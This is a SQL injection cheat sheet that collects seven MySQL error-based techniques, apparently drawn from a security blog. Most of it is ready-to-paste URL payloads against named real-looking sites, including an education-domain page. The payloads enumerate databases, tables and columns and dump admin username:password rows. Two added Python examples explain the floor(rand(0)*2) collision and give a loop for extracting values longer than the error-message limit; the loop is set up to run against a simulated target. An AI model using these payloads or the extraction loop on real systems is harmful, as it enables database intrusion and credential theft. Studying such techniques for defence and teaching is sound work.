MySQL error-based injection: 7 methods collected

1. Errors via floor() (the grouped table needs at least 3 rows, which is why the payloads group over information_schema.tables; the leaked value in the "Duplicate entry" message is cut at 64 characters)

  /* Database version */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Shorthand for the payloads in this section: the wrapper never changes, only the inner expression (written here as info()) is swapped for what you want to leak */
  http://www.waitalone.cn/sql.php?id=info()

  /* Current connection user */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Current database */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Databases: one schema name per request, step the LIMIT offset to enumerate */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Tables in the current database */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Columns of the admin table (0x61646D696E is 'admin' in hex, so no quotes are needed) */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  /* Row contents: username:password from admin */
  http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
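Why the floor() wrapper above produces an error at all, as an added example that is not code from the original post: the Python below re-implements MySQL's my_rnd() generator with the seeding RAND(N) uses (constants from the MySQL source, sql/item_func.cc and mysys) and models the GROUP BY temp-table behaviour the trick depends on: when a row's group key is not yet in the table, the key expression is evaluated a second time to build the row that is inserted, so rand(0) advances twice for that row. With the fixed sequence 0,1,1,0,1,1,... the third row inserts a key that already exists. The prefix string stands in for whatever the inner subquery returned; the row counts, the 5.5.20 version string and the message text are assumptions for illustration.

```python
# Added example, not code from the original post: a model of why
# "... concat(<value>, floor(rand(0)*2)) x ... group by x" raises ERROR 1062.
# MySQLRand re-implements my_rnd() and the RAND(N) seeding from MySQL's source;
# group_by_floor_rand models the GROUP BY temp-table behaviour that evaluates
# the key expression again when it inserts a new group.
MAX_VALUE = 0x3FFFFFFF  # my_rnd() modulus


class MySQLRand:
    """MySQL's my_rnd(), seeded the way RAND(N) seeds it (N = 0 in the payloads)."""

    def __init__(self, seed=0):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_sequence(seed=0, n=9):
    """floor(rand(seed)*2) for the first n evaluations; seed 0 gives 0,1,1,0,1,1,0,0,1."""
    rnd = MySQLRand(seed)
    return [int(rnd.next() * 2) for _ in range(n)]


def group_by_floor_rand(rows, value="~5.5.20~", seed=0):
    """Model of: select count(*), concat(value, floor(rand(seed)*2)) x
                 from <a table with `rows` rows> group by x
    Returns ("ok", {group_key: count}) or ("error", message)."""
    rnd = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        key = value + str(int(rnd.next() * 2))   # evaluated to look the group up
        if key in groups:
            groups[key] += 1
            continue
        key = value + str(int(rnd.next() * 2))   # evaluated again to build the inserted row
        if key in groups:                         # the collision the payload relies on
            return ("error", "Duplicate entry '%s' for key 'group_key'" % key)
        groups[key] = 1
    return ("ok", groups)


if __name__ == "__main__":
    print(floor_rand_sequence())
    for rows in (1, 2, 3):
        print(rows, "rows ->", group_by_floor_rand(rows))
```

With one or two rows the query succeeds (the only group is the "...1" key), and from three rows on the model fails on the third row exactly as MySQL does, which is why the payloads group over information_schema.tables rather than over a table that might be nearly empty.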

2. ExtractValue (MySQL 5.1.5 and later; the leaked text is truncated to 32 characters)

  http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
  http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3. UpdateXml (same 32-character limit on the leaked text)

  http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
  http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
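Working past the 32-character limit of both the ExtractValue and UpdateXml methods, as an added example that is not code from the original post: the value is read in substr() windows of 31 characters (32 minus the leading "~" delimiter) and the pieces are concatenated from the successive "XPATH syntax error" messages. The HTTP target is replaced by a constructed oracle that only evaluates the substr() window and applies the same truncation, so the loop runs offline; the sample row, the table name admin and the expression are assumptions. Against the page's sql.php the oracle would send the payload in the id parameter and return the response body.

```python
# Added example, not code from the original post: pulling a value longer than
# 32 characters through extractvalue()/updatexml() by walking it with substr().
# The oracle here is a constructed stand-in for the vulnerable page so the loop
# runs offline; against a real target, oracle() would send the payload in the
# id parameter and return the response body.
import re

CHUNK = 31  # 32-character XPath error limit minus the leading '~' delimiter


def chunk_payload(expr, pos, chunk=CHUNK):
    """Value for the id parameter that leaks characters pos..pos+chunk-1 of expr.
    updatexml(1, concat(0x7e, ...), 1) leaks the same text through the same error."""
    return "1 and extractvalue(1, concat(0x7e, substr((%s),%d,%d)))" % (expr, pos, chunk)


# Shape of the error MySQL reports: XPATH syntax error: '~<leaked text>'
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def parse_error(body):
    """Text between the '~' delimiter and the closing quote, or None if nothing leaked."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def extract_value(oracle, expr, chunk=CHUNK):
    """Request successive substr() windows until one comes back short or empty."""
    out, pos = "", 1
    while True:
        leaked = parse_error(oracle(chunk_payload(expr, pos, chunk)))
        if not leaked:
            return out
        out += leaked
        if len(leaked) < chunk:
            return out
        pos += chunk


def simulated_oracle(secret):
    """Constructed stand-in for sql.php: evaluates only the substr() window of the
    payload and applies the 32-character truncation of the XPath error text."""
    window = re.compile(r"substr\(\(.*\),(\d+),(\d+)\)")

    def oracle(payload):
        m = window.search(payload)
        pos, length = int(m.group(1)), int(m.group(2))
        piece = secret[pos - 1:pos - 1 + length]
        return "ERROR 1105 (HY000): XPATH syntax error: '%s'" % ("~" + piece)[:32]
    return oracle


# Constructed sample row (admin / md5("password")): 38 characters, so two requests.
SAMPLE_SECRET = "admin:5f4dcc3b5aa765d61d8327deb882cf99"
SAMPLE_EXPR = "select concat(username,0x3a,password) from admin limit 0,1"

if __name__ == "__main__":
    print(extract_value(simulated_oracle(SAMPLE_SECRET), SAMPLE_EXPR))
```

The loop stops on the first window that is shorter than 31 characters or empty, so a value whose length is an exact multiple of 31 costs one extra request; a page that suppresses MySQL errors returns no match and the function returns whatever was collected so far.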

4. NAME_CONST (older versions only)

  http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

  mysql> select * from article where id=1 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x);
  ERROR 1060 (42S21): Duplicate column name '5.5.20-log'

5. Error-based double query injection (http://www.vaibs.in/error-based-double-query-injection/); same floor(rand(0)*2) collision as method 1, but grouped over the application's own table, which therefore needs at least 3 rows

  /* Database version */
  http://www.waitalone.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1

6. Based on MySQL data type overflow (see the separate document)

7. Based on MySQL function errors (see the separate document); functions that raise a usable error:
  1. GeometryCollection()
  2. linestring()
  3. multipoint()
  4. multilinestring()
  5. multipolygon()
  6. polygon()
  7. name_const()